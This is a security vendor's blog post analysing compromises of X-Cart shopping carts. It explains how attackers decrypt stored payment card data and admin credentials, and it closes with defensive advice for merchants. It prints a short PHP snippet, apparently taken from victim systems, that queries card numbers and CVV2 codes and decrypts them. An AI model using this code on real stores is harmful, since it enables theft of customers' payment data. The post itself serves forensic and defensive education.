Trustwave SpiderLabs Uncovers Ov3r_Stealer Malware Spread via Phishing and Facebook Advertising. Learn More

Trustwave SpiderLabs Uncovers Ov3r_Stealer Malware Spread via Phishing and Facebook Advertising. Learn More

Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

Database Security

Prevent unauthorized access and exceed compliance requirements.

Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Microsoft Exchange Server Attacks
Stay protected against emerging threats
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats
SpiderLabs Blog

Analysing X-Cart Compromises

Recently I've found myself performing a lot of forensic examinations of X-Cart shopping carts. This isn't surprising: X-Cart is a very widely adopted and relatively low cost shopping cart platform. Its popularity makes it an attractive target for attackers because the large number of target installs makes it easier for them to get a return on the investment required to understand and develop tools to compromise the platform.

It is also an attractive target because many X-Cart users are small organisations who don't have a huge budget to maintain their online presence. Because of this, many X-Cart installs are missing security patches and/or haven't been configured according to best practice.

I spoke about e-commerce compromises in my Five E-Commerce Security Myths blog posts a few months ago. In those posts I pointed out that most merchants didn't know that they were actually storing payment card data, or that they believed that stored card data was encrypted. This is especially true of merchants using X-Cart, possibly due to X-Cart's messaging around PCI-DSS and cardholder data encryption.

Most X-Cart installs that we see are either storing payment card data for use in a "Store and Download" processing methodology, or they are using a Third-party Payment Gateway API. Most merchants using a "Store and Download" model are working under the assumption that a) they are safe because the data is encrypted and b) that cardholder data removed once a transaction has been processed. Unfortunately these two assumptions are false.

Whilst it is true that most X-Cart installs encrypt stored payment card data, attackers have tried and tested techniques for reversing this encryption. Whilst we imagine that our encrypted data will take thousands of years and a foreign intelligence agency to break, the truth is more like the famous XKCD "crypto wrench" comic about encryption - the attackers just take a different path to achieve the same result in minutes.

We commonly see code similar to following 15 lines of PHP on victim systems:



$blowfish = new ctBlowfish();

$my_link = mysql_connect($db_host, $db_user, $db_password);
$my_link = mysql_select_db($db_name, $my_link);

$result = mysql_query("select id, card_name, card_number, card_expire, card_cvv2 from xcart_customers where card_number <> ''");

while ($row = mysql_fetch_assoc($result)) {
print text_decrypt($row['card_number'])

Simple, huh? When the above code is executed it will go ahead and use the decryption functions built into X-Cart to decrypt the stored data for the attacker. X-Cart use the same encryption methods to store their login credentials as well, so an attacker with the ability to run the above code will also obtain all of the administrator's usernames and passwords.


Of course, attackers first need to gain the ability to run the above PHP code in the victim environment. There are a number of ways that we see this happen:

  • Missing X-Cart patches - There are a number of publicly disclosed, serious security flaws in older versions of X-Cart. Attackers know about and make use of these to inject malicious software into victim environments.

  • Poorly configured shared hosting environments - X-Cart is often installed in shared hosting environments due to their relatively low cost. In a shared environment it is critical that the file permissions on X-Cart's config.php file are secure. If any other user in the environment can see the contents of config.php they will have the database access credentials and encryption keys required to take over the shopping cart and steal all of the data within it.
  • Poorly secured 3rd party modules - We often see situations where the victim has properly secured the shopping cart, but has neglected to keep other software in the same hosting account or server up to date. Common targets are the blog software Wordpress, the editor FCKEditor, forum software like vBulletin and image gallery software. The end result is the same - the attacker can execute code in the environment, thereby tricking X-Cart into handing them decrypted versions of sensitive data.

So what to do about all of this? The same three recommendations from my previous blog posts still apply:

  1. Do not store payment card data - Its just not worth it. There are many third-party service providers that know how to do this better than you.
  2. Keep your shopping cart (and any other software in your hosting account) up to date - The attackers know about the flaws patched by these updates and they use them. Many merchants find it difficult to install security updates because they have customised their shopping cart software in a non-standard way. You should anticipate needing to install security patches and ensure that you expand your shopping cart in a way that doesn't make it difficult to apply them.
  3. Check your website regularly. If you see a new .php file that looks something like the 15 lines of PHP above, you should contact your bank.

Latest SpiderLabs Blogs

Welcome to Adventures in Cybersecurity: The Defender Series

I’m happy to say I’m done chasing Microsoft certifications (AZ104/AZ500/SC100), and as a result, I’ve had the time to put some effort into a blog series that hopefully will entertain and inform you...

Read More

Trustwave SpiderLabs: Insights and Solutions to Defend Educational Institutions Against Cyber Threats

Security teams responsible for defending educational institutions at higher education and primary school levels often find themselves facing harsh lessons from threat actors who exploit the numerous...

Read More

Breakdown of Tycoon Phishing-as-a-Service System

Just weeks after Trustwave SpiderLabs reported on the Greatness phishing-as-a-service (PaaS) framework, SpiderLabs’ Email Security team is tracking another PaaS called Tycoon Group.

Read More